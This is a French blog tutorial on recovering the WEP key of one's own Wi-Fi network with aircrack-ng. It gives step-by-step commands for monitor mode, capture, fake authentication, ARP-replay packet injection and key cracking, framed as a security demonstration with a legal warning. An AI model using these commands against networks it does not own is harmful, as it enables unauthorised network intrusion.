Cracker la clé wep de son point d’accès wifi

A l’heure actuel il est facilement possible de trouver la clé wep d’un réseau sans fil.

Aller hop un petit condensé trouver sur wikipedia qui explique très bien la chose.
Le Wired Equivalent Privacy (abrégé WEP) est un protocole pour sécuriser les réseaux sans fil de type Wi-Fi. Les réseaux sans fil diffusant les messages échangés par ondes radioélectriques, sont particulièrement sensibles aux écoutes clandestines. Le WEP tient son nom du fait qu’il devait fournir aux réseaux sans fil une confidentialité comparable à celle d’un réseau local filaire classique.

Le WEP 64 bits utilise une clé de chiffrement de 40 bits à laquelle est concaténé un vecteur d’initialisation (initialization vector ou IV en anglais) de 24 bits. La clé et le vecteur d’initialisation forment ainsi une clé RC4 de 64 bits permettant de chiffrer les données échangées.

Parce que RC4 est un algorithme de chiffrement par flot, la même clé ne doit pas être utilisée deux fois pour chiffrer les données échangées. C’est la raison de la présence d’un vecteur d’initialisation (IV). Ce vecteur, transmis sans protection, permet d’éviter la répétition. Cependant, un IV de 24 bits n’est pas assez long pour éviter ce phénomène sur un réseau très actif. De plus, le vecteur d’initialisation est utilisé de telle façon qu’il rend le WEP sensible à une attaque par clé apparentée.

Une Attaque par clé apparentée est une forme de cryptanalyse où l’adversaire peut observer les opérations d’un algorithme de chiffrement lorsqu’il est utilisé avec différentes clés, aux valeurs inconnues, mais qui sont liées entre elles par des propriétés mathématiques connues de l’attaquant.

Etape 1 : Prérequis

Ce tutorial est rédigé pour fonctionner sous les systèmes d’exploitations Linux Ubuntu/Debian.
Vous devez disposer d’une carte wifi qui gère l’injection de packet nous verrons plus tard comment savoir si la votre la gère.
Votre réseau sans fils configuré avec une clé wep, le votre, celui qui est physiquement chez vous, pas celui du voisin.

Etape 2 : Installation de la solution aircrack-ng sur ubuntu

Note: Vous pouvez aussi télécharger le système d’exploitation linux appelé backtrack qui regroupe tous les utilitaires dont nous aurons besoin dans ce tutorial.

Installation des prérequis :

[sh]apt-get install build-essential
apt-get install libssl-dev[/sh]

Téléchargement d’aircrack :

[sh]wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz[/sh]

On décompresse :

[sh]tar -zxvf aircrack-ng-1.1.tar.gz[/sh]

Rendez-vous dans le dossier fraîchement décompressé : cd aircrack-ng-1.1

Ouvrez le fichier « common.mak » et remplacer la ligne : [sh]CFLAGS ?= -g -W -Wall -Werror -O3 [/sh]par la suivante : [sh]CFLAGS ?= -g -W -Wall -O3[/sh]

On compile:

[sh]make install[/sh]

La suite aircrack est maintenant installé

On va vérifier de suite si votre carte wifi est compatible avec l’injection de packet :

On repère d’abord sa carte réseau sans fils avec un petit ifconfig : Généralement elles commencent toutes avec un indicatif « wlan » contrairement au carte éthernet (filaire) qui commence par « eth ». Pour moi cela sera wlan1

[sh]airmon-ng start wlan1[/sh]

Pensez à remplacer « wlan1 » par le nom de votre propre carte.

Cette commande vise à monter votre carte en mode monitoring cela permet à votre carte d’écouter le trafic de votre réseau.
Si tout c’est bien passé une nouvelle carte réseau virtuelle a été monté (mon0), vous pouvez la voir en tapant la commande: iwconfig

Pour moi cela donne :

Image

On va maintenant vérifier si votre carte supporte l’injection de paquet avec la commande suivante :

[sh]aireplay-ng -9 mon0[/sh]

Image

Ici nous pouvons voir que la carte que j’utilise gère l’injection de paquet, si vous n’obtenez pas ce résultat c’est que probablement votre carte ne gère pas l’injection de paquet.
Personnellement voici la carte que j’utilise : SMCWUSB-N2 vous trouverez iciune liste de cartes non exhaustive

Etape 3 : L’attaque par injection de paquet

On affiche les réseaux wifi qui sont configurés avec du wep

[sh]airodump-ng –encrypt wep mon0[/sh]

Image

Puis on lance la capture de data sur notre point d’accès

[sh]airodump-ng –encrypt wep –bssid 00:22:3F:41:80:56 -w out -c 1 mon0[/sh]

–bssid : Adresse mac du point d’accès
-w out : On enregistre la capture dans un fichier de sortie nommé out
-c 1 : On se fixe sur le channel de notre point d’accés
mon0 : interface utilisé

Image

On va maintenant réalisé une fakeauthentification sur le point d’accès pour savoir si celui-ci utilise le filtrage par adresse mac

[sh]aireplay-ng -1 10 -a 00:22:3F:41:80:56 -b 00:22:3F:41:80:56 -h 00-22-2D-28-A0-11  mon0 –ignore-negative-one[/sh]

aireplay-ng -1 10 : indique que l’on réalise une attaque de fakeauthentification avec un timeout de 10

-a -b : BSSID du point d’accés

-h : votre adresse mac

–ignore-negative-one : Outrepasse le bug sous ubuntu des channels négatifs.

Si vous avez réussi à vous authentifier vous devriez avoir le retour suivant:

Image

Dans notre cas l’AP (Point d’accès) n’utilise pas le filtrage par adresse mac.
Il faut savoir que cela peut ne pas marcher même si l’ap est configurée pour ne pas utiliser le filtrage en effet si la puissance (PWR) et la qualité (RXQ) du signal wifi est < 50 vous risquez d’avoir quelques soucis.

On va maintenant injecter des paquets pour stimuler le réseau et ainsi capturer des datas beaucoup plus rapidement nécessaire pour trouver la clé wep

[sh]aireplay-ng -3 -x 100 -b 00:22:3F:41:80:56 -h 04:46:65:BA:3C:Cb  mon0 –ignore-negative-one[/sh]

aireplay-ng -3 -x 100 : indique que l’on réalise une injection de paquets et que l’on injecte 100 paquets par seconde. Valeur réglable de 1 à 1024.
-a -b : BSSID du point d’accés
-h : votre adresse mac
–ignore-negative-one : Outrepasse le bug sous ubuntu des channels négatifs.

Image

Si l’injection se passe correctement vous devriez voir augmenter le nombre de #data ainsi #/s

Image

#data : Nombre de paquets capturés, seuls les paquets contenant des iv sont comptés
#/s : Nombre de paquets par seconde mesuré toutes les 10 secondes

Dès que l’injection commence vous pouvez commencer à essayer de déchiffrer la clé en utilisant le fichier de sortie ou sont stockés les ivs

[sh]aircrack-ng out.cap[/sh]

Aircrack commence à déchiffrer la clé :

Image

Cela lui aura pris un peu plus de deux minutes pour la trouver …

Image

On peut donc considérer qu’un réseau configuré en wep n’est pas sécurisé.
je tiens à vous rappeler qu’il est interdit et punis par la lois de s’introduire sur un réseau sans l’accord de son propriétaire.
PS: Si vous avez des questions ou si vous avez noté des erreurs merci de poster un commentaire

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.